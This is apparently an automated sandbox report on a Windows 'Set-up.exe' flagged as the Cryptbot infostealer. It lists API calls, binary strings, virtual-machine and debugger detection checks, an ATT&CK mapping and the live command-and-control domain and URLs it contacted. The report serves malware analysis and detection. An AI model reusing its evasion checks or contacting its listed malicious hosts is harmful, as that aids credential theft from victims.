Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00D39880	0_2_00D39880
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00FED890	0_2_00FED890
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00D2B840	0_2_00D2B840
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E0F850	0_2_00E0F850
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E5D9E0	0_2_00E5D9E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00F43960	0_2_00F43960
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00FD9920	0_2_00FD9920
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DEB900	0_2_00DEB900
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E29A50	0_2_00E29A50
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E49A10	0_2_00E49A10
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E9FA10	0_2_00E9FA10
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CC1BE0	0_2_00CC1BE0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01003A70	0_2_01003A70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00FDDB80	0_2_00FDDB80
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00D5BB50	0_2_00D5BB50
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00FD1B50	0_2_00FD1B50
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00FFBB10	0_2_00FFBB10
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E07CA0	0_2_00E07CA0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00EEDC6C	0_2_00EEDC6C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DD7C70	0_2_00DD7C70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E5FC50	0_2_00E5FC50
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E0FDE0	0_2_00E0FDE0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00C95DB0	0_2_00C95DB0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00FE1D80	0_2_00FE1D80
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E6FD60	0_2_00E6FD60
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00F2DD60	0_2_00F2DD60
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DF1D30	0_2_00DF1D30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00C93ED0	0_2_00C93ED0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CF3EF0	0_2_00CF3EF0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CA5EB0	0_2_00CA5EB0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00FF3E40	0_2_00FF3E40
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E09E20	0_2_00E09E20
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00FFDE30	0_2_00FFDE30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01001E60	0_2_01001E60
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00FFFF70	0_2_00FFFF70

Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00E37120 appears 50 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 01008B80 appears 34 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00CC5340 appears 35 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00D644A0 appears 46 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00C873F0 appears 47 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00E5E710 appears 32 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00E5CBC0 appears 551 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00E5A170 appears 58 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00CC4FD0 appears 145 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00CC4F40 appears 162 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00E37310 appears 50 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00C875A0 appears 298 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00E5C9B0 appears 102 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00E5CA40 appears 108 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00CC50A0 appears 50 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00E37220 appears 861 times

Source: Set-up.exe

Static PE information: invalid certificate

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal88.troj.spyw.evad.winEXE@1/0@9/2

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00C9D090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,

0_2_00C9D090

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00CF3EF0 strcmp,CertOpenSystemStoreA,CertEnumCertificatesInStore,CertEnumCertificatesInStore,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CertGetIntendedKeyUsage,GetLastError,CertGetEnhancedKeyUsage,CertGetEnhancedKeyUsage,strcmp,GetLastError,CertFreeCertificateContext,CertCloseStore,

0_2_00CF3EF0

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00C8255D

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00C829FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,

0_2_00C829FF

Source: C:\Users\user\Desktop\Set-up.exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
Source: Set-up.exe	String found in binary or memory: in-addr.arpa
Source: Set-up.exe	String found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 7343240 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4dd800
Source: Set-up.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x152200

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00C814E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00C814E0

Source: Set-up.exe

Static PE information: section name: .eh_fram

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C08A40 push eax; ret	0_3_00C08A41
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C0EF54 pushad ; iretd	0_3_00C0EF55
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C0EF54 pushad ; iretd	0_3_00C0EF55
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C0EF54 pushad ; iretd	0_3_00C0EF55
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00BFF9E8 pushad ; iretd	0_3_00BFF9E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C05D20 push 462000CBh; retn 0000h	0_3_00C05D2A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C08A40 push eax; ret	0_3_00C08A41
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C0EF54 pushad ; iretd	0_3_00C0EF55
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C0EF54 pushad ; iretd	0_3_00C0EF55
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C0EF54 pushad ; iretd	0_3_00C0EF55
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00BFF9E8 pushad ; iretd	0_3_00BFF9E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C05D20 push 462000CBh; retn 0000h	0_3_00C05D2A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C08A40 push eax; ret	0_3_00C08A41
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C0EF54 pushad ; iretd	0_3_00C0EF55
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C0EF54 pushad ; iretd	0_3_00C0EF55
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C0EF54 pushad ; iretd	0_3_00C0EF55
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00BFF9E8 pushad ; iretd	0_3_00BFF9E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C05D20 push 462000CBh; retn 0000h	0_3_00C05D2A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C08A40 push eax; ret	0_3_00C08A41
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C0EF54 pushad ; iretd	0_3_00C0EF55
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C0EF54 pushad ; iretd	0_3_00C0EF55
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C0EF54 pushad ; iretd	0_3_00C0EF55
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00BFF9E8 pushad ; iretd	0_3_00BFF9E9
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_00C05D20 push 462000CBh; retn 0000h	0_3_00C05D2A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_010041D0 push eax; mov dword ptr [esp], edx	0_2_010041D5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00EA0300 push eax; mov dword ptr [esp], 00000000h	0_2_00EA0305
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CFC6D0 push eax; mov dword ptr [esp], edx	0_2_00CFC6D5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00D28640 push eax; mov dword ptr [esp], edx	0_2_00D28645
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CC0AC0 push eax; mov dword ptr [esp], 00000000h	0_2_00CC0AC4
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DE1130 push eax; mov dword ptr [esp], edx	0_2_00DE1135
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CE1430 push eax; mov dword ptr [esp], 00000000h	0_2_00CE1433

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\Set-up.exe

Code function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second

0_2_00C829FF

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Set-up.exe	Binary or memory string: PROCMON.EXE
Source: Set-up.exe	Binary or memory string: X64DBG.EXE
Source: Set-up.exe	Binary or memory string: WINDBG.EXE
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Set-up.exe	Binary or memory string: WIRESHARK.EXE

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00E69980 rdtsc

0_2_00E69980

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00C829FF

Source: C:\Users\user\Desktop\Set-up.exe

API coverage: 7.5 %

Source: C:\Users\user\Desktop\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00C8255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,	0_2_00C8255D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00C829FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,	0_2_00C829FF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00E5E270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,	0_2_00E5E270

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00C8255D

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00C8255D

Source: Set-up.exe	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Set-up.exe	Binary or memory string: Hyper-V RAW
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000000.00000003.2049588705.0000000000997000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Set-up.exe, 00000000.00000002.2253280536.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2251976781.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2252171171.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2252153907.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2251997102.0000000000C0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Set-up.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00E69980 rdtsc

0_2_00E69980

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00C829FF

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00C814E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00C814E0

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00C8116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,

0_2_00C8116C

Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00E693D0 GetSystemTime,SystemTimeToFileTime,

0_2_00E693D0

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_01153F30 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,

0_2_01153F30

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Set-up.exe, Set-up.exe, 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: procmon.exe
Source: Set-up.exe, Set-up.exe, 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 4764, type: MEMORYSTR

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.5:49706 -> 34.147.147.173:80

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 4764, type: MEMORYSTR

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CBA550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,	0_2_00CBA550
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00D4AA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,	0_2_00D4AA30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CCE480 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,	0_2_00CCE480

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Install Root Certificate	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	17 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221fd4	100%	Avira URL Cloud	malware
thirttj13vsj13vs.top	0%	Avira URL Cloud	safe
http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221http://home.thirttj13vs.top/jhkNTMUXVuSQJm	100%	Avira URL Cloud	malware
http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221?argument=0	100%	Avira URL Cloud	malware
home.thirttj13vs.top	100%	Avira URL Cloud	malware
indohome.thirttj13vs.top	100%	Avira URL Cloud	malware
http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221	100%	Avira URL Cloud	malware
homettj13vsj13vs.top	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.thirttj13vs.top	34.147.147.173	true	false		high
httpbin.org	50.19.58.113	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
indohome.thirttj13vs.top	true	Avira URL Cloud: malware	unknown
http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221?argument=0	true	Avira URL Cloud: malware	unknown
http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221	true	Avira URL Cloud: malware	unknown
thirttj13vsj13vs.top	true	Avira URL Cloud: safe	unknown
homettj13vsj13vs.top	true	Avira URL Cloud: safe	unknown
home.thirttj13vs.top	true	Avira URL Cloud: malware	unknown
https://httpbin.org/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
